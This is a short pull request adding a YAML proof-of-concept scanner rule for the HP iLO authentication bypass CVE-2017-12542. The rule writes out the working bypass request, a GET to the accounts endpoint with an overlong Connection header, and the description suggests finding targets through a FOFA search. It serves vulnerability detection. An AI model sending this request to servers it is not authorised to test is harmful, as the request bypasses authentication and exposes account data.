### PR TITLE
poc-yaml-ilo-cve-2017-12542

### DIFF
--- a/pocs/ilo-cve-2017-12542.yml
+++ b/pocs/ilo-cve-2017-12542.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-ilo-cve-2017-12542
+rules:
+  - method: GET
+    path: "/rest/v1/AccountService/Accounts"
+    headers:
+      Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("iLO User"))
+detail:
+  author: 0d9y
+  links:
+    - https://www.freebuf.com/vuls/167124.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
HP-iLO-Server cve-2017-12542漏洞
## 测试环境
fofa "HP-iLO-Server"
## 备注
无